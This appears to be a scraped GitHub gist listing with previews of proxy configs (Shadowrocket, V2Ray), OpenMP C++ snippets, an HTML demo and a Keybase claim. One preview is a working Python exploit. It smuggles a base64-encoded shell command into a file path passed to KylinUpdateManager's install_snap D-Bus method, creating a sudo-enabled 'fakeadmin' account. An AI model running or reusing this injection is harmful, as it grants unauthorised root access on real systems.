These rules are adopted from the AngularJS commit conventions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Best Shadowrocket Rules (https://github.com/nthack/Shadowrocket-ADBlock-Rules-Easy) | |
# by nthack | |
# build time: 2024-11-24 00:22:37 | |
[General] | |
bypass-system = true | |
skip-proxy = 192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, localhost, *.local, e.crashlytics.com, captive.apple.com | |
bypass-tun = 10.0.0.0/8,100.64.0.0/10,127.0.0.0/8,169.254.0.0/16,172.16.0.0/12,192.0.0.0/24,192.0.2.0/24,192.88.99.0/24,192.168.0.0/16,198.18.0.0/15,198.51.100.0/24,203.0.113.0/24,224.0.0.0/4,255.255.255.255/32 | |
dns-server = system, 114.114.114.114, 112.124.47.27, 8.8.8.8, 8.8.4.4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Config file of V2Ray. This file follows standard JSON format, with comments support. | |
// Uncomment entries below to satisfy your needs. Also read our manual for more detail at | |
// https://www.v2fly.org/ | |
{ | |
"log": { | |
// By default, V2Ray writes access log to stdout. | |
// "access": "/path/to/access/log/file", | |
// By default, V2Ray write error log to stdout. | |
// "error": "/path/to/error/log/file", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import dbus | |
import base64 | |
command = "adduser fakeadmin && adduser fakeadmin sudo && echo 'fakeadmin:Bb123***'|chpasswd" | |
command_base64 = base64.b64encode(command.encode()).decode() | |
path = '/tmp/`echo ' + command_base64 + '|base64 -d|sh`' | |
bus = dbus.SystemBus() | |
remote_object = bus.get_object("cn.kylinos.KylinUpdateManager", "/cn/kylinos/KylinUpdateManager") | |
remote_object.install_snap(path, dbus_interface="cn.kylinos.KylinUpdateManager") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include "omp.h" | |
#include <sys/time.h> | |
#include <chrono> | |
#include <cmath> | |
using namespace std; | |
int mask[3]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include "omp.h" | |
#include <sys/time.h> | |
#include <chrono> | |
#include <cmath> | |
using namespace std; | |
class EquationsLinearSystem | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>Mouse Follow</title> | |
<style> | |
#p { | |
text-align: center; | |
-webkit-appearance: none; | |
-moz-appearance: none; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include "omp.h" | |
#include <sys/time.h> | |
#include <chrono> | |
#include <cmath> | |
using namespace std; | |
void DataInit (double* pMatrix, double* pVector, int Size) { // Init components of vector and matrix | |
int i; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include "omp.h" | |
#include <sys/time.h> | |
#include <chrono> | |
using namespace std; | |
double random(double start, double end) | |
{ | |
return start + (end - start) * rand() / (RAND_MAX + 1.0); |
I hereby claim:
- I am glzjin on github.
- I am glzjin (https://keybase.io/glzjin) on keybase.
- I have a public key ASCnRvgA_gnoSKwFqmIuDLxsh1P3CTGdDraJmd1eZ3Y1fgo
To claim this, I am signing this object:
NewerOlder